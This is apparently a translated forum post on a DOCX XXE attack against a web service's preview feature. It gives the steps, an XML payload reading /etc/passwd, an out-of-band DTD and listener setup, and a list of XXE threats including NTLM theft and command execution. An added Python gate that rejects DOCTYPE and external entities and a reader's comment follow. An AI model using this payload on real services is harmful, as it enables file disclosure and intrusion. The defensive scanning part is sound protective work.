DOCX XXE: detailed steps
The vulnerability write-up was posted, but the concrete steps were not, so I have put them together here:
1. Create a .docx file and type some arbitrary content into it (an empty file will not open).
2. Extract the .docx with 7-Zip and locate the .xml file.
3. Edit the .xml file and insert the XXE declaration:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <!-- inserted line -->
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
Alternatively, use the following payload:
Upload an ext.dtd file to your own server with the following content:
4. Upload the .docx file and click "preview".
Or listen on port 80 on your own server:
sudo python -m SimpleHTTPServer 80
XXE threats:
1- DoS on the parsing system by making it open, e.g. file:///dev/random | file:///dev/urandom | file://c:/con/con
2- TCP scans using HTTP external entities (including behind firewalls, since application servers often have a view of the network different from that of the attacker)
3- Unauthorised access to data stored as XML files on the parsing system's file system (of course the attacker still needs a way to get this data back)
4- DoS on other systems (if the parsing system is allowed to establish TCP connections to other systems)
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
6- Doomsday scenario: a widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
7- Directory listing, reading system and application files and, in some cases, executing system commands using the PHP expect:// wrapper
- See more at: http://attack-secure.com/hacked-facebook-word-document/#sthash.sggH5LSK.dpuf
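From the defender's side, the steps and threat list above boil down to one fact: a .docx is a zip of XML parts, and no legitimate OOXML part ever carries a DOCTYPE, let alone a SYSTEM/PUBLIC entity. The following is an added example (not code from the original post or the referenced write-up) of a pre-parse gate for an upload or preview handler: it unpacks the archive, scans each XML part as raw bytes for a DOCTYPE or external entity declaration, and refuses the file before any XML parser can resolve anything. The sample documents, the `file:///PLACEHOLDER/path` target and the function names are constructed for the example.

```python
import io
import re
import zipfile

# Constructed sample parts: a minimal .docx assembled in memory. The malicious
# word/document.xml carries the DOCTYPE/ENTITY shape used in the post, with a
# placeholder target path. These fixtures are not files from the original post.
CONTENT_TYPES = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    b'<Default Extension="xml" ContentType="application/xml"/>'
    b'<Override PartName="/word/document.xml" ContentType="application/vnd.'
    b'openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    b'</Types>'
)

BENIGN_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>test</w:t></w:r></w:p></w:body></w:document>'
)

MALICIOUS_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER/path" >]>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>test &xxe;</w:t></w:r></w:p></w:body></w:document>'
)

# Any DOCTYPE is out of place in an OOXML part. A SYSTEM or PUBLIC identifier
# inside a DOCTYPE or ENTITY declaration (general or parameter entity, or an
# external DTD reference) is the XXE pattern itself.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_REF_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)

# Upper bound on a single decompressed part, so a zip bomb cannot turn the
# scan itself into the DoS (threat 1 above). Chosen for the example.
MAX_PART_BYTES = 20 * 1024 * 1024


def build_docx(document_xml):
    """Assemble an in-memory .docx (a plain zip) from the constructed parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def find_dtd_in_docx(data):
    """Return [(part_name, kind)] for every XML part that should be rejected.

    kind is 'external-entity' when a SYSTEM/PUBLIC reference is present (the
    XXE pattern), 'doctype' for an internal-only DOCTYPE, or 'oversized' when
    the part exceeds MAX_PART_BYTES. Parts are inspected as raw bytes; no XML
    parser runs, so nothing can be resolved before the decision is made.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            if not name.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_PART_BYTES:
                findings.append((name, "oversized"))
                continue
            part = z.read(name)
            if DOCTYPE_RE.search(part):
                kind = "external-entity" if EXTERNAL_REF_RE.search(part) else "doctype"
                findings.append((name, kind))
    return findings


def is_safe_to_parse(data):
    """Gate for an upload/preview handler: True only if no part was flagged."""
    return not find_dtd_in_docx(data)


if __name__ == "__main__":
    for label, xml in (("benign", BENIGN_DOCUMENT_XML), ("xxe", MALICIOUS_DOCUMENT_XML)):
        print(label, find_dtd_in_docx(build_docx(xml)))
```

This gate is a cheap first line, not the fix itself: the preview service must also configure its XML parser to forbid DTDs and never resolve external entities (and, per threat 4 above, run without outbound network access), because a rejected-at-upload check says nothing about other paths by which XML reaches the same parser.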
1 create docx --- 2 extract with WinRAR --- 3 edit xml --- 4 save --- 5 pack as zip --- 6 rename to docx --- 7 upload --- 8 preview
Steps 1-4 are clear, but can 5-6 really be done like that? You promised "detailed"... I have been testing the whole time and it doesn't work this way...